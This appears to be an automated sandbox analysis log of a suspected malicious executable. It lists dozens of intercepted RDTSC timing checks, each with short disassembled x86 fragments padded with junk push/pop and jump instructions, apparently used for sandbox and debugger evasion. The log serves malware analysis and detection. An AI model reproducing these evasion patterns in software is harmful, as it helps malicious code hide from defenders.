                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17D66 second address: E17D86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18021 second address: E18036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18036 second address: E18046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7AB0FF7756h 0x0000000a jno 00007F7AB0FF7756h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E181C2 second address: E181D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC8Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1859A second address: E1859E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1859E second address: E185A8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7AB12EBC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E185A8 second address: E185B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7AB0FF775Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E186FB second address: E186FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E186FF second address: E18705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18705 second address: E18734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a ja 00007F7AB12EBC8Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F7AB12EBC8Eh 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E189F1 second address: E189F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E189F7 second address: E189FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E189FB second address: E18A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7AB0FF775Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1BBE8 second address: E1BBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21BB8 second address: E21BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F7AB0FF775Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E20587 second address: E2059B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7AB12EBC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7AB12EBC8Ah 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2085D second address: E20887 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7AB0FF7762h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007F7AB0FF775Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E20B8B second address: E20B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2027F second address: E202B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7AB0FF7764h 0x0000000c jmp 00007F7AB0FF7769h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26B7F second address: E26B84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26B84 second address: E26BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F7AB0FF776Dh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26BAD second address: E26BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7AB12EBC86h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26BB7 second address: E26BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26BBB second address: E26BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26BC1 second address: E26BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26BCB second address: E26BE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC92h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD08E second address: DDD094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD5C1 second address: DDD60F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F7AB12EBC86h 0x0000000d jmp 00007F7AB12EBC8Bh 0x00000012 popad 0x00000013 popad 0x00000014 add dword ptr [esp], 2DABB54Ah 0x0000001b or edi, 49BD87D1h 0x00000021 call 00007F7AB12EBC89h 0x00000026 jmp 00007F7AB12EBC94h 0x0000002b push eax 0x0000002c push edx 0x0000002d je 00007F7AB12EBC8Ch 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD60F second address: DDD661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jnp 00007F7AB0FF7768h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jns 00007F7AB0FF7765h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7AB0FF7762h 0x00000024 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD661 second address: DDD667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD667 second address: DDD671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7AB0FF7756h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD78E second address: DDD798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7AB12EBC86h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD798 second address: DDD7C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7AB0FF7756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d pushad 0x0000000e mov ebx, edx 0x00000010 popad 0x00000011 nop 0x00000012 jmp 00007F7AB0FF7767h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD7C7 second address: DDD7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD972 second address: DDD978 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD978 second address: DDD99B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB12EBC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD99B second address: DDD99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE0CD second address: DDE11C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jp 00007F7AB12EBCA2h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push ecx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop ecx 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 jmp 00007F7AB12EBC8Fh 0x00000028 pop esi 0x00000029 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE11C second address: DDE140 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7AB0FF775Ch 0x00000008 jno 00007F7AB0FF7756h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7AB0FF775Eh 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3075 second address: DC307B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25CEC second address: E25CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25CF2 second address: E25CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2612C second address: E2614B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F7AB0FF775Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F7AB0FF7756h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E262C8 second address: E262CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E262CE second address: E262EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7AB0FF7767h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E262EB second address: E262F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2648B second address: E264C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F7AB0FF7762h 0x00000010 js 00007F7AB0FF7756h 0x00000016 jnl 00007F7AB0FF7756h 0x0000001c pushad 0x0000001d jng 00007F7AB0FF7756h 0x00000023 jmp 00007F7AB0FF7764h 0x00000028 popad 0x00000029 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E264C3 second address: E264CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E265ED second address: E26611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF7763h 0x00000009 pop ebx 0x0000000a pop ecx 0x0000000b jl 00007F7AB0FF777Eh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26778 second address: E2677C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E29172 second address: E29178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E29178 second address: E29184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31337 second address: E31340 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31340 second address: E3134F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 jne 00007F7AB12EBC86h 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30CEB second address: E30CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31003 second address: E31008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31008 second address: E31019 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7AB0FF7758h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31019 second address: E31029 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7AB12EBC86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31029 second address: E31060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7760h 0x00000007 jmp 00007F7AB0FF7763h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7AB0FF775Ch 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E31060 second address: E31066 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35672 second address: E356A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7AB0FF7763h 0x0000000c jmp 00007F7AB0FF7766h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3487D second address: E34887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7AB12EBC86h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E34887 second address: E3489B instructions: 0x00000000 rdtsc 0x00000002 js 00007F7AB0FF7756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F7AB0FF7756h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E349FE second address: E34A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F7AB12EBC92h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3500E second address: E35039 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7AB0FF7758h 0x00000008 jg 00007F7AB0FF7758h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F7AB0FF7788h 0x00000016 pushad 0x00000017 jmp 00007F7AB0FF775Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35039 second address: E3504F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7AB12EBC8Ch 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3504F second address: E35055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E351B5 second address: E351C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F7AB12EBC88h 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E36DD5 second address: E36DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF775Fh 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3CDD2 second address: E3CDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB12EBC92h 0x00000009 pop edi 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3CDE9 second address: E3CDEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B611 second address: E3B624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7AB12EBC8Ch 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B624 second address: E3B665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF7767h 0x00000009 pop edi 0x0000000a push ecx 0x0000000b jmp 00007F7AB0FF7763h 0x00000010 pop ecx 0x00000011 popad 0x00000012 jnc 00007F7AB0FF7764h 0x00000018 push edx 0x00000019 jns 00007F7AB0FF7756h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3BD6C second address: E3BD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3BD70 second address: E3BD74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDCB9 second address: DDDCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDCBD second address: DDDCD3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7AB0FF7756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F7AB0FF7758h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3BEF1 second address: E3BEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C0B1 second address: E3C0B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C0B6 second address: E3C0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F7AB12EBC8Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4495C second address: E44980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF775Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7AB0FF7764h 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42B71 second address: E42B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42B7C second address: E42B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7AB0FF7760h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42B90 second address: E42B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42F95 second address: E42F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42F99 second address: E42F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42F9D second address: E42FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4326D second address: E4327A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jc 00007F7AB12EBC86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4385E second address: E4387B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7AB0FF7762h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4387B second address: E43881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E440A8 second address: E440B2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E440B2 second address: E440B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E440B6 second address: E440BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4438F second address: E44395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44395 second address: E44399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
